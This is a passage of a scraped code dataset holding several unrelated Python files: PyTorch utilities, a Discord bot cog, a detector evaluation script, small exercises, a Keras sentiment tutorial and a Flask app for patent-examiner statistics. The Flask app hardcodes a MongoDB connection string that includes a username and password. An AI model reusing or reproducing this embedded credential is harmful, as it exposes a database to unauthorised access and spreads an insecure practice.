nn.Linear(in_features=out_feat, out_features=n_classes),\r\n activation\r\n ]\r\n return nn.Sequential(*layers)\r\n\r\nclass PCA(nn.Module):\r\n def __init__(self, pca_model, scaler_model=None):\r\n super(PCA, self).__init__()\r\n \r\n if scaler_model is not None:\r\n self.has_scale = True\r\n self.scale = nn.Parameter(torch.from_numpy(scaler_model.scale_).type(torch.FloatTensor))\r\n self.scale_mean = nn.Parameter(torch.from_numpy(scaler_model.mean_).type(torch.FloatTensor))\r\n else:\r\n self.has_scale = False\r\n \r\n if pca_model.mean_ is None:\r\n self.mean = nn.Parameter(torch.zeros(1))\r\n else:\r\n self.mean = nn.Parameter(torch.from_numpy(pca_model.mean_).type(torch.FloatTensor))\r\n self.components = nn.Parameter(torch.from_numpy(pca_model.components_).t().type(torch.FloatTensor))\r\n self.whiten = pca_model.whiten\r\n self.explained_variance = nn.Parameter(torch.from_numpy(pca_model.explained_variance_).type(torch.FloatTensor))\r\n\r\n self.n_components = pca_model.n_components_\r\n self.noise_variance = pca_model.noise_variance_\r\n self.singular_values = torch.from_numpy(pca_model.singular_values_).type(torch.FloatTensor)\r\n self.explained_variance_ratio = torch.from_numpy(pca_model.explained_variance_ratio_).type(torch.FloatTensor)\r\n \r\n def forward(self, x):\r\n if self.has_scale:\r\n x = x - self.scale_mean\r\n x = x / self.scale\r\n \r\n if self.mean is not None:\r\n x = x - self.mean\r\n \r\n x_transformed = torch.mm(x, self.components)\r\n \r\n if self.whiten:\r\n x_transformed = x_transformed / torch.sqrt(self.explained_variance) \r\n \r\n return x_transformed\r\n\r\n\r\n\r\ndef save_net(fname, net):\r\n import h5py\r\n h5f = h5py.File(fname, mode='w')\r\n for k, v in net.state_dict().items():\r\n h5f.create_dataset(k, data=v.cpu().numpy())\r\n\r\ndef load_net(fname, net):\r\n import h5py\r\n h5f = h5py.File(fname, mode='r')\r\n for k, v in net.state_dict().items():\r\n param = torch.from_numpy(np.asarray(h5f[k]))\r\n v.copy_(param)\r\n\r\ndef weights_normal_init(model, dev=0.01):\r\n if isinstance(model, list):\r\n for m in model:\r\n weights_normal_init(m, dev)\r\n else:\r\n for m in model.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0.0, dev)\r\n elif isinstance(m, nn.Linear):\r\n m.weight.data.normal_(0.0, dev)\r\n\r\n\r\ndef save_chkpt(model, chkpt_num, model_dir):\r\n\r\n # Save model\r\n chkpt_fname = os.path.join(model_dir, \"model{}.chkpt\".format(chkpt_num))\r\n torch.save(model.state_dict(), chkpt_fname)\r\n\r\ndef save_checkpoint(state, filename):\r\n directory = os.path.dirname(filename)\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n torch.save(state, filename)\r\n print('Saved model state dict at %s.' % filename)\r\n\r\n\r\n\r\ndef load_network_from_chkpt(model, chkpt_num, model_dir):\r\n\r\n chkpt_fname = os.path.join(model_dir, \"model{}.chkpt\".format(chkpt_num))\r\n model.load_state_dict(torch.load(chkpt_fname))\r\n\r\n return model\r\n\r\ndef load_model(fpath, cuda=True):\r\n if cuda:\r\n return torch.load(fpath).cuda()\r\n return torch.load(fpath)\r\n\r\n\r\ndef save_model(model, fpath):\r\n torch.save(model.cpu(), fpath)\r\n\r\n\r\ndef load_weights_from_source(target, source_state): #未调试\r\n new_dict = OrderedDict()\r\n for k, v in target.state_dict().items():\r\n if k in source_state and v.size() == source_state[k].size():\r\n new_dict[k] = source_state[k]\r\n else:\r\n new_dict[k] = v\r\n target.load_state_dict(new_dict)\r\n\r\ndef load_weights(model, fpath):\r\n state = torch.load(fpath)\r\n model.load_state_dict(state['state_dict'])\r\n\r\n\r\ndef save_weights(model, fpath, epoch=None, name=None):\r\n torch.save({\r\n 'name': name,\r\n 'epoch': epoch,\r\n 'state_dict': model.state_dict()\r\n }, fpath)\r\n\r\n\r\ndef freeze_layers(model, n_layers):\r\n i = 0\r\n for child in model.children():\r\n if i >= n_layers:\r\n break\r\n print(i, \"freezing\", child)\r\n for param in child.parameters():\r\n param.requires_grad = False\r\n i += 1\r\n\r\n\r\ndef freeze_nested_layers(model, n_layers):\r\n i = 0\r\n for child in model.children():\r\n for grandchild in child.children():\r\n if isinstance(grandchild, torch.nn.modules.container.Sequential):\r\n for greatgrand in grandchild.children():\r\n if i >= n_layers:\r\n break\r\n for param in greatgrand.parameters():\r\n param.requires_grad = False\r\n print(i, \"freezing\", greatgrand)\r\n i += 1\r\n else:\r\n if i >= n_layers:\r\n break\r\n for param in grandchild.parameters():\r\n param.requires_grad = False\r\n print(i, \"freezing\", grandchild)\r\n i += 1\r\n\r\n\r\ndef init_nested_layers(module, init_func):\r\n for child in module.children():\r\n if len(list(child.children())) > 0:\r\n init_nested_layers(child, init_func)\r\n else:\r\n init_weights(child, init_func)\r\n\r\n\r\n\r\n\r\ndef init_weights(module,init_func):\r\n for m in module.modules():\r\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\r\n print(\"initializing \", m, \" with xavier init\")\r\n init_func(m.weight)\r\n if hasattr(m, 'bias') and m.bias is not None:\r\n print(\"initial bias from \", m, \" with zeros\")\r\n nn.init.constant(m.bias, 0.0)\r\n elif isinstance(m, nn.Sequential):\r\n for mod in m:\r\n init_weights(mod,init_func)\r\n\r\n return module\r\n\r\n\r\ndef cut_model(model, cut):\r\n return nn.Sequential(*list(model.children())[:cut])\r\n\r\ndef get_requires_grad_params(model):\r\n \r\n model_params = filter(lambda p: p.requires_grad, model.parameters()) \r\n return model_params\r\n\r\n\r\ndef create_criterion(**criterion_params):\r\n criterion_name = criterion_params.pop('criterion', None)\r\n if criterion_name is None:\r\n return None\r\n criterion = nn.__dict__[criterion_name](**criterion_params)\r\n if torch.cuda.is_available():\r\n criterion = criterion.cuda()\r\n return criterion\r\n\r\n\r\ndef create_optimizer(model, **optimizer_params):\r\n optimizer_name = optimizer_params.pop('optimizer', None)\r\n if optimizer_name is None:\r\n return None\r\n optimizer = torch.optim.__dict__[optimizer_name](\r\n filter(lambda p: p.requires_grad, model.parameters()),\r\n **optimizer_params)\r\n return optimizer\r\n\r\ndef load_sub_modules_from_pretrained(pretraind_sub_modules_list,model_sub_modules_list):\r\n for p,m in zip(pretraind_sub_modules_list,model_sub_modules_list):\r\n for param_p,param_m in zip(p.parameters(),m.parameters()):\r\n assert_equal(param_p.size(),param_m.size())\r\n m.load_state_dict(p.state_dict())\r\n\r\ndef clip_gradient(model, clip_norm):\r\n \"\"\"Computes a gradient clipping coefficient based on gradient norm.\"\"\"\r\n totalnorm = 0\r\n for p in model.parameters():\r\n if p.requires_grad:\r\n modulenorm = p.grad.data.norm()\r\n totalnorm += modulenorm ** 2\r\n totalnorm = np.sqrt(totalnorm)\r\n\r\n norm = clip_norm / max(totalnorm, clip_norm)\r\n for p in model.parameters():\r\n if p.requires_grad:\r\n p.grad.mul_(norm)\r\n\r\n#def clip_gradient(optimizer, grad_clip):\r\n# for group in optimizer.param_groups:\r\n# for param in group['params']:\r\n# param.grad.data.clamp_(-grad_clip, grad_clip)\r\n\r\n#def clip_gradient(optimizer, max_norm, norm_type=2):\r\n# max_norm = float(max_norm)\r\n# if norm_type == float('inf'):\r\n# total_norm = max(p.grad.data.abs().max() for group in optimizer.param_groups for p in group['params'])\r\n# else:\r\n# total_norm = 0.0\r\n# for group in optimizer.param_groups:\r\n# for p in group['params']:\r\n# try:\r\n# param_norm = p.grad.data.norm(norm_type)\r\n# nn = param_norm ** norm_type\r\n# # print('norm:', nn, p.grad.size())\r\n# total_norm += nn\r\n# param_norm ** norm_type\r\n# except:\r\n# pass\r\n# total_norm = total_norm ** (1. / norm_type)\r\n# clip_coef = max_norm / (total_norm + 1e-6)\r\n# if clip_coef < 1:\r\n# for group in optimizer.param_groups:\r\n# for p in group['params']:\r\n# try:\r\n# p.grad.data.mul_(clip_coef)\r\n# except:\r\n# pass\r\n# return total_norm\r\n\r\ndef moving_average(net1, net2, alpha=1):\r\n for param1, param2 in zip(net1.parameters(), net2.parameters()):\r\n param1.data *= (1.0 - alpha)\r\n param1.data += param2.data * alpha\r\n\r\ndef average_checkpoints(inputs): #权值平均\r\n \"\"\"Loads checkpoints from inputs and returns a model with averaged weights.\r\n Args:\r\n inputs: An iterable of string paths of checkpoints to load from.\r\n Returns:\r\n A dict of string keys mapping to various values. The 'model' key\r\n from the returned dict should correspond to an OrderedDict mapping\r\n string parameter names to torch Tensors.\r\n \"\"\"\r\n params_dict = collections.OrderedDict()\r\n params_keys = None\r\n new_state = None\r\n for f in inputs:\r\n state = torch.load(\r\n f,\r\n map_location=(\r\n lambda s, _: torch.serialization.default_restore_location(s, 'cpu')\r\n ),\r\n )\r\n # Copies over the settings from the first checkpoint\r\n if new_state is None:\r\n new_state = state\r\n\r\n model_params = state['model'] #注意model关键字key\r\n\r\n model_params_keys = list(model_params.keys())\r\n if params_keys is None:\r\n params_keys = model_params_keys\r\n elif params_keys != model_params_keys:\r\n raise KeyError(\r\n 'For checkpoint {}, expected list of params: {}, '\r\n 'but found: {}'.format(f, params_keys, model_params_keys)\r\n )\r\n\r\n for k in params_keys:\r\n if k not in params_dict:\r\n params_dict[k] = []\r\n params_dict[k].append(model_params[k])\r\n\r\n averaged_params = collections.OrderedDict()\r\n # v should be a list of torch Tensor.\r\n for k, v in params_dict.items():\r\n summed_v = None\r\n for x in v:\r\n summed_v = summed_v + x if summed_v is not None else x\r\n averaged_params[k] = summed_v / len(v)\r\n new_state['model'] = averaged_params\r\n return new_state\r\n\r\n\r\n\r\n\r\n","repo_name":"dsp6414/Pytorch-Lib","sub_path":"net_utils/net_utils.py","file_name":"net_utils.py","file_ext":"py","file_size_in_byte":16865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70648013168","text":"import core\nimport discord\nfrom util import paginators\n\n\nclass Config(core.Cog):\n\n @core.group(\n name=\"shortcuts\",\n aliases=(\"sc\", \"shortcut\"),\n cooldown=(3, 2),\n description=\"View or modify your current shortcuts.\",\n usage=\"[ add | remove | clear | search ]\",\n invoke_without_command=True\n )\n async def _shortcuts(self, ctx):\n shortcuts = await ctx.db.fetch(\"SELECT * FROM shortcuts WHERE user_id=$1\", ctx.author.id)\n fields = ([{\n \"name\": shortcut[\"name\"],\n \"value\": shortcut[\"command\"][:1024],\n \"inline\": False\n } for shortcut in shortcuts] if len(shortcuts)>0 else [{\n \"name\": \"No shortcuts!\",\n \"value\": f\"To create a shortcut, use `{ctx.clean_prefix}shortcuts add`\"\n }])\n\n _embed = discord.Embed(color=core.COLOR, timestamp=ctx.now)\n _embed.set_author(name=f\"{ctx.author.name}'s Shortcuts\", icon_url=ctx.avatar)\n _embed.description = f\"{len(shortcuts)}/{core.MAX_SHORTCUTS} shortcuts\"\n await paginators.field_paginate(ctx, _embed, fields, footer=\"Page {page}\")\n\n\n @_shortcuts.command(\n name=\"add\",\n aliases=(\"make\", \"create\", \"+\"),\n cooldown=(2, 1),\n description=\"Create a new shortcut.\",\n usage=\" \",\n examples=(\n \"shortcuts add coffee buy coffee --use-after\",\n \"shortcuts add \\\"some shortcut\\\" shop amogus --no-reply\"\n )\n )\n async def _shortcuts_add(self, ctx, shortcut, *, command):\n if len(shortcut) > 64:\n return await ctx.send(\"Length of shortcut must be under 64 characters.\")\n shortcut = shortcut.strip().lower()\n if len(shortcut) < 1:\n return await ctx.send(\"Shortcut name is required.\")\n if ctx.bot.get_command(shortcut):\n return await ctx.send(\"Shortcut name must not be the name of an existing command.\")\n shortcuts = ctx.db.shortcut_cache.get(ctx.author.id, [])\n if len(shortcuts) >= core.MAX_SHORTCUTS:\n return await ctx.send(f\"You can only have up to **{core.MAX_SHORTCUTS:,}** shortcuts.\")\n if any(sc[\"name\"] == shortcut for sc in shortcuts):\n return await ctx.send(\"A shortcut with that name already exists.\")\n\n await ctx.db.add_shortcut(ctx.author, shortcut, command)\n await ctx.send(f\"Shortcut `{shortcut}` created.\")\n\n\n @core.group(\n name=\"prefix\",\n aliases=(\"pr\", \"prefixes\"),\n cooldown=(0.5, 0.2),\n brief=\"View or modify prefixes.\",\n description=(\n \"View and/or modify your server's prefixes. \"\n \"You can have up to 20 prefixes at once.\"\n ),\n usage=\"prefix [add|remove|clear|set] [prefixes]\",\n examples=(\n \"prefix\",\n \"prefix add !\",\n \"prefix add \\\"hey, \\\"\",\n \"prefix add ! ? -\",\n \"prefix remove !\",\n \"prefix remove \\\"hey, \\\"\",\n \"prefix clear\"\n ),\n bot_perms=(\"Send Messages\", \"Embed Links\"),\n invoke_without_command=True\n )\n @core.check(bot_perms=('send_messages', 'embed_links'))\n async def _prefix(self, ctx):\n\n await ctx.cd()\n _prefixes = await ctx.bot.db.get(\"guilds\", ctx.guild, \"prefixes\")\n embed = discord.Embed(\n color=core.COLOR,\n timestamp=ctx.now,\n title=f\"{len(_prefixes)} prefix{'es' if len(_prefixes)!=1 else ''}\",\n description=\"\\n\".join(_prefixes)\n )\n await ctx.send(embed)\n\n @_prefix.command(\n name=\"add\",\n aliases=(\"create\", \"make\", \"a\", \"+\"),\n cooldown=(1, 0.5),\n brief=\"Add prefixes.\",\n description=(\n \"Add prefixes to your server. \"\n \"You can add multiple prefixes at once by seperating them by space, \"\n \"and if your prefix has a space, surround it in quotes.\"\n ),\n usage=\"prefix add <...prefixes>\",\n examples=(\n \"prefix add !\",\n \"prefix add ! ? -\",\n \"prefix add \\\"hey, \\\"\",\n \"prefix add \\\"hey, \\\" ! ?\"\n ),\n perms=\"Server Administrator\"\n )\n @core.check(perms=(\"administrator\",))\n async def _prefix_add(self, ctx, *prefixes):\n await ctx.cd()\n if len(prefixes) <= 0:\n return await ctx.send(\"Please give me prefixes to add.\")\n\n _prefixes = await ctx.bot.db.get(\"guilds\", ctx.guild, \"prefixes\")\n if len(prefixes) + len(_prefixes) > 20:\n return await ctx.send(\"You can only have a maximum of 20 prefixes.\")\n\n if any(len(pf) > 32 for pf in prefixes):\n return await ctx.send(\"Lengths of prefixes must be under 32 characters.\")\n\n _new = [*prefixes, *_prefixes]\n await ctx.bot.db.set(\"guilds\", \"prefixes\", ctx.guild, _new)\n await ctx.send(f\"Successfully added {len(prefixes)} prefix{'es' if len(prefixes)!=1 else ''}\")\n\n\ndef setup(client):\n cog = Config(client)\n client.add_cog(cog)\n","repo_name":"jay3332/ShrimpMaster","sub_path":"cogs/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"} +{"seq_id":"25267813197","text":"__author__ = \"Alexey Antonenko, vedrusss@gmail.com\"\n\nimport argparse\nimport os\nimport json\nimport cv2\nimport numpy as np\nfrom collections import defaultdict\nfrom detect import Detector\nfrom detect_recognize import DigitsDetector\n\nbase_name = lambda path: '.'.join(os.path.split(path)[-1].split('.')[:-1])\nscan_files = lambda folder: {base_name(name): os.path.join(folder, name)\n for name in os.listdir(folder) if os.path.isfile(os.path.join(folder, name))}\n\ndef compare(detections, gt_objects):\n TPs, FNs = defaultdict(int), defaultdict(int)\n for obj in gt_objects:\n label, ltrb = obj['label'], obj['box']\n boxes = [d['box'] for d in detections if d['label'] is None or d['label'] == label]\n if has_intersection(ltrb, boxes):\n TPs[label] += 1\n else:\n FNs[label] += 1\n FPs = defaultdict(int)\n for d in detections:\n label, box = d['label'], d['box']\n gt_boxes = [obj['box'] for obj in gt_objects if label is None or obj['label'] == label]\n if label is None:\n label = 'none'\n if not has_intersection(box, gt_boxes):\n FPs[label] += 1\n return TPs, FNs, FPs\n\ndef evaluate_detector(detector, test_data, and_recognizer=False, stop=None):\n all_TPs, all_FNs, all_FPs = defaultdict(int), defaultdict(int), defaultdict(int)\n i = 0\n for im_path, ann_path in test_data:\n image = cv2.imread(im_path)\n assert(image is not None), f\"Cannot read {im_path}\"\n objects = parse_annotation(ann_path)\n detections = detector(image)\n if not and_recognizer:\n detections = [{'box':b, 'label':None, 'score':None} for b in detections]\n TPs, FNs, FPs = compare(detections, objects)\n for label in TPs.keys():\n all_TPs[label] += TPs[label]\n all_FNs[label] += FNs[label]\n for label in FPs.keys():\n all_FPs[label] += FPs[label]\n i += 1\n if stop and i > stop: break\n \n pres, recs, f1ss = defaultdict(int), defaultdict(int), defaultdict(int)\n for label, fps in all_FPs.items():\n tps = all_TPs[label] if label in all_TPs else sum(all_TPs.values())\n fns = all_FNs[label] if label in all_FNs else sum(all_FNs.values())\n detections_amount = tps + fps\n gt_objects_amount = tps + fns\n pres[label], recs[label], f1ss[label] = pre_rec_f1s(tps, fns, fps)\n tps = sum(all_TPs.values())\n fns = sum(all_FNs.values())\n fps = sum(all_FPs.values())\n i_pre, i_rec, i_f1s = pre_rec_f1s(tps, fns, fps)\n stats = {}\n stats['per_label'] = (pres, recs, f1ss)\n stats['integral'] = (i_pre, i_rec, i_f1s)\n results = (all_TPs, all_FNs, all_FPs)\n return stats, results\n\ndef pre_rec_f1s(tps, fns, fps):\n all_dets = tps + fps\n gt_positives = tps + fns\n pre = tps / float(all_dets) if all_dets > 0 else None\n rec = tps / float(gt_positives) if gt_positives > 0 else None\n f1s = 2. * pre * rec / (pre + rec) if pre and rec else None\n return pre, rec, f1s\n\ndef has_intersection(box, boxes, iou_threhold=0.6):\n for b in boxes:\n IoU = iou(box, b)\n #print(box, b, IoU, iou_threhold)\n if IoU >= iou_threhold:\n return True\n return False\n\ndef iou(b1, b2):\n l, t = max(b1[0], b2[0]), max(b1[1], b2[1])\n r, b = min(b1[2], b2[2]), min(b1[3], b2[3])\n if l >= r or t >= b: \n return 0.0 # no intersection at all\n interArea = max(0, r-l+1) * max(0, b-t+1)\n b1Area = (b1[2] - b1[0] + 1) * (b1[3] - b1[1] + 1)\n b2Area = (b2[2] - b2[0] + 1) * (b2[3] - b2[1] + 1)\n return interArea / float(b1Area + b2Area - interArea)\n\n\ndef parse_annotation(filepath):\n d = json.load(open(filepath))\n return d.get('objects', [])\n\ndef parse_args():\n parser = argparse.ArgumentParser(\"Tool to create data for digits detector\")\n parser.add_argument('-i', '--images', type=str, required=True, \n help='Folders with digit images')\n parser.add_argument('-a', '--annotations', type=str, required=True, \n help='Folder annotations')\n parser.add_argument('-dm','--detector_models', type=str, nargs='+',\n help='Detector model file(-s)')\n parser.add_argument('-cm','--classifier_model', type=str, default=None,\n help=\"Specify classifier model to evaluate the whole pipeline\")\n parser.add_argument('-o', '--output', type=str, default=None,\n help=\"Where to store montages for analysis\")\n return parser.parse_args()\n\ndef main(args):\n image_files = scan_files(args.images)\n annotations = scan_files(args.annotations)\n test_data = [[im_path, annotations[name]] for name, im_path in image_files.items() if name in annotations]\n \n opencv_model = False # args.detector_models.endswith('.xml')\n stop = None\n if args.classifier_model:\n detector = DigitsDetector(args.detector_models, args.classifier_model)\n stats, results = evaluate_detector(detector, test_data, True, stop)\n else:\n detector = Detector(args.detector_models, opencv_model, resize_factor=2.)\n stats, results = evaluate_detector(detector, test_data, False, stop)\n # print stats\n print(\"--- 'per_label' ---\")\n metrics = stats['per_label']\n for label in metrics[0].keys():\n print(f\"{label}\\tprecision: {round(metrics[0][label],3)}, recall: {round(metrics[1][label],3)}, f1 score: {round(metrics[2][label],3)}\")\n print(\"--- 'integral' ---\")\n metrics = stats['integral']\n print(f\"precision: {round(metrics[0],3)}, recall: {round(metrics[1],3)}, f1 score: {round(metrics[2],3)}\")\n\nif __name__ == \"__main__\":\n main(parse_args())\n","repo_name":"vedrusss/digits-detection-recognition","sub_path":"eval_detector.py","file_name":"eval_detector.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4614673858","text":"def best_sum(targ, nums, memo = {}):\n \n if targ in memo:\n return memo[targ]\n # base cases:\n if targ == 0:\n return []\n # targ < 0: clear history\n if targ < 0:\n return None\n \n best = None\n # recursive case:\n # loop through nums\n for n in nums:\n if n == 0:\n continue\n new_targ = targ - n\n new_result = best_sum(new_targ, nums)\n if new_result != None and (best == None or len(best) > len(new_result)):\n best = new_result + [n]\n \n # subtract num from targ (and add it to history)\n # call how sum on new targ and history\n memo[targ] = best\n return best\n\nnums = [2,5]\ntarg = 8\nprint (best_sum(targ, nums))","repo_name":"eee-vvv/algorithm-practice","sub_path":"dynamic_programming/best_sum.py","file_name":"best_sum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36275193674","text":"def computepay(hours,rate):\n\tif hours > 40:\n\t\tregpay = hours * float(rate)\n\t\tovertime = (0.5 * float(rate)) * (hours - 40)\n\t\tpay = regpay + overtime\n\t\n\telse:\n\t\tpay = hours * float(rate)\n\n\tprint(pay)\ntry:\n\t\thours = int(input('Enter Hours'))\n\t\trate = input('Enter Pay')\t\nexcept:\n\t\tprint(\"Error, Please Enter Numeric Input\")\n\t\ncomputepay(hours, rate)","repo_name":"agonzalezcurci/class-work","sub_path":"pay3.py","file_name":"pay3.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2072855109","text":"# 영화 리뷰가 긍정적인지 부정적인지 예측하기\n\nimport numpy as np\nimport tensorflow as tf\nfrom numpy import array\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Embedding\n\n# 텍스트 리뷰 자료 지정\ndocs = ['너무 재밌어요', '최고에요', '참 잘 만든 영화에요', '추천하고 싶은 영화입니다', '한 번 더 보고 싶네요',\n '글쎄요', '별로에요', '생각보다 지루해요', '연기가 어색해요', '재미없어요', '너무 재미없다', '참 재밌네요']\n\n# 긍정 리뷰는 1 부정 리뷰는 0으로 클래스 지정\nclasses = array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0])\n\n# 토큰화\ntoken = Tokenizer()\ntoken.fit_on_texts(docs)\nprint(token.word_index)\n\n# 토큰에 지정된 인덱스로 새로운 배열 생성\nx = token.texts_to_sequences(docs)\n\n# 서로 다른 길이의 데이터를 4개로 맞추기 (패딩)\npadded_x = pad_sequences(x, 4)\n\"\\n패딩 결과\\n\", print(padded_x)\n\n# 임베딩에 입력될 단어 수 지정\nword_size = len(token.word_index) + 1\n\n# 단어 임베딩을 포함하여 모델 생성 + 결과 출력\nmodel = Sequential()\nmodel.add(Embedding(word_size, 8, input_length=4))\nmodel.add(Flatten())\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\nmodel.fit(padded_x, classes, epochs=20)\n\nprint(\"\\n Accuracy: %.4f\" % (model.evaluate(padded_x, classes)[1]))\n\n# Epoch 20/20\n# 1/1 [==============================] - 0s 3ms/step - loss: 0.6394 - accuracy: 0.8333\n# 1/1 [==============================] - 0s 72ms/step - loss: 0.6370 - accuracy: 0.8333\n# \n# Accuracy: 0.8333\n","repo_name":"nikel4610/Machine_Learning_forStudy","sub_path":"02_More_Deeplearning/03_Basic_NLP.py","file_name":"03_Basic_NLP.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"24242939520","text":"\r\n# A very simple Flask Hello World app for you to get started with...\r\ndef get_month_text (number):\r\n\r\n if number==1:\r\n return \"January\"\r\n if number==2:\r\n return \"February\"\r\n if number==3:\r\n return \"March\"\r\n if number==4:\r\n return \"April\"\r\n if number==5:\r\n return \"May\"\r\n if number==6:\r\n return \"June\"\r\n if number==7:\r\n return \"July\"\r\n if number==8:\r\n return \"August\"\r\n if number==9:\r\n return \"September\"\r\n if number==10:\r\n return \"October\"\r\n if number==11:\r\n return \"November\"\r\n if number==12:\r\n return \"December\"\r\n\r\nfrom flask import Flask\r\nfrom flask import jsonify\r\nimport datetime\r\nfrom datetime import date, timedelta\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pprint\r\nfrom pprint import pprint\r\nimport json\r\nimport pymongo\r\nfrom decimal import *\r\nfrom flask import request\r\nfrom flask_caching import Cache\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom flask import Flask, render_template, request, jsonify\r\n\r\nmatplotlib.use('agg')\r\nconfig = {\r\n \"DEBUG\": True, # some Flask specific configs\r\n \"CACHE_TYPE\": \"simple\", # Flask-Caching related configs\r\n \"CACHE_DEFAULT_TIMEOUT\": 300\r\n}\r\napp = Flask(__name__)\r\napp.config.from_mapping(config)\r\ncache = Cache(app)\r\nfrom flask_cors import CORS, cross_origin\r\ncors = CORS(app)\r\napp.config['CORS_HEADERS'] = 'Content-Type'\r\n@app.route('/')\r\n@app.route('/data')\r\ndef get_examiner():\r\n ## Initializing the mongo connection\r\n examiner_name = request.args['name']\r\n return jsonify(hello_world(examiner_name))\r\n\r\n# index route, shows index.html view\r\n@app.route('/application')\r\ndef index():\r\n return render_template('index.html')\r\n\r\ndef hello_world(examiner_name):\r\n ## Initializing the mongo connection\r\n connection_string = 'mongodb+srv://Zeevtest:Zeevtest@freship-fu97s.mongodb.net/test?retryWrites=true&w=majority'\r\n from bson.decimal128 import Decimal128\r\n from bson.codec_options import TypeCodec\r\n class DecimalCodec(TypeCodec):\r\n python_type = Decimal # the Python type acted upon by this type codec\r\n bson_type = Decimal128 # the BSON type acted upon by this type codec\r\n def transform_python(self, value):\r\n \"\"\"Function that transforms a custom type value into a type\r\n that BSON can encode.\"\"\"\r\n return Decimal128(value)\r\n def transform_bson(self, value):\r\n \"\"\"Function that transforms a vanilla BSON type value into our\r\n custom type.\"\"\"\r\n return value.to_decimal()\r\n decimal_codec = DecimalCodec()\r\n\r\n today = date.today()\r\n cutoff_date = today - timedelta(days=70)\r\n\r\n from bson.codec_options import TypeRegistry\r\n type_registry = TypeRegistry([decimal_codec])\r\n from bson.codec_options import CodecOptions\r\n codec_options = CodecOptions(type_registry=type_registry)\r\n\r\n mongo_client = pymongo.MongoClient(connection_string)\r\n mydb = mongo_client[\"patents\"]\r\n db = mongo_client[\"patents\"]\r\n examiners_collection = mydb.get_collection(\"examiners_new\" , codec_options=codec_options)\r\n\r\n print(examiner_name)\r\n examiner_record = examiners_collection.find_one({'examiner':examiner_name})\r\n\r\n if examiner_record is None:\r\n print (\"no examiner record\")\r\n\r\n else:\r\n if \"total_refused\" in examiner_record:\r\n examiner_apps_refused = examiner_record.get(\"total_refused\")\r\n else:\r\n examiner_apps_refused = 0\r\n if \"total_refused_with_interview\" in examiner_record:\r\n examiner_apps_refused_with_interview = examiner_record.get(\"total_refused_with_interview\")\r\n else:\r\n examiner_apps_refused_with_interview = 0\r\n if \"total_refused_without_interview\" in examiner_record:\r\n examiner_apps_refused_without_interview = examiner_record.get(\"total_refused_without_interview\")\r\n else:\r\n examiner_apps_refused_without_interview = 0\r\n\r\n if \"total_granted\" in examiner_record:\r\n examiner_apps_granted = examiner_record.get(\"total_granted\")\r\n else:\r\n examiner_apps_granted = 0\r\n if \"total_granted_with_interview\" in examiner_record:\r\n examiner_apps_granted_with_interview = examiner_record.get(\"total_granted_with_interview\")\r\n else:\r\n examiner_apps_granted_with_interview = 0\r\n if \"total_granted_without_interview\" in examiner_record:\r\n examiner_apps_granted_without_interview = examiner_record.get(\"total_granted_without_interview\")\r\n else:\r\n examiner_apps_granted_without_interview = 0\r\n\r\n examiner_apps_we_have = examiner_apps_granted + examiner_apps_refused\r\n examiner_grant_rate = \"%.0f%%\" % (100 * examiner_apps_granted / examiner_apps_we_have)\r\n examiner_grant_rate_with_interview = \"%.0f%%\" % (100 * examiner_apps_granted_with_interview / (examiner_apps_granted_with_interview + examiner_apps_refused_with_interview))\r\n examiner_grant_rate_without_interview = \"%.0f%%\" % (100 * examiner_apps_granted_without_interview / (examiner_apps_granted_without_interview + examiner_apps_refused_without_interview))\r\n interview_improvement_rate = \"%.0f%%\" % (100 * (examiner_apps_granted_with_interview / (examiner_apps_granted_with_interview + examiner_apps_refused_with_interview)) / (examiner_apps_granted_without_interview / (examiner_apps_granted_without_interview + examiner_apps_refused_without_interview))-100)\r\n\r\n # Here comes the monthly data:\r\n successful_month_retrieved = examiner_record.get(\"successful_month\")\r\n failed_month_retrieved = examiner_record.get(\"failed_month\")\r\n successful_month = []\r\n failed_month = []\r\n month_stat = []\r\n #possible_response_month = []\r\n total_successful_responses = 0\r\n total_failed_responses = 0\r\n\r\n for i in range (1,14):\r\n successful_month.append(0)\r\n failed_month.append(0)\r\n month_stat.append(0)\r\n #possible_response_month.append(0)\r\n\r\n try:\r\n for key,value in successful_month_retrieved.items():\r\n key = int(key)\r\n successful_month[key] = value\r\n total_successful_responses = total_successful_responses + value\r\n except AttributeError:\r\n print (\"no successful month data\")\r\n total_successful_responses = 0.00000000000000000000000001\r\n try:\r\n for key,value in failed_month_retrieved.items():\r\n key = int(key)\r\n failed_month[key] = value\r\n total_failed_responses = total_failed_responses + value\r\n except AttributeError:\r\n print (\"no failed month data\")\r\n\r\n #print (\"monthly statistics, month by month\")\r\n for i in range (0,13):\r\n if (failed_month[i] !=0):\r\n month_stat[i] = successful_month[i] / (successful_month[i] + failed_month [i])\r\n #month_stat[i] = \"%.0f%%\" % (100 * month_stat[i])\r\n #if (i !=0):\r\n #print (\"Month\",str(i),\": \",month_stat[i], \" \")\r\n\r\n response_success_rate = total_successful_responses / ( total_successful_responses + total_failed_responses)\r\n\r\n # Run through the 6 months including and after the one where the office action was issued:\r\n recommended_month_stat = 0\r\n\r\n recommended_month_stat = \"%.0f%%\" % (100 * recommended_month_stat)\r\n response_success_rate = \"%.0f%%\" % (100 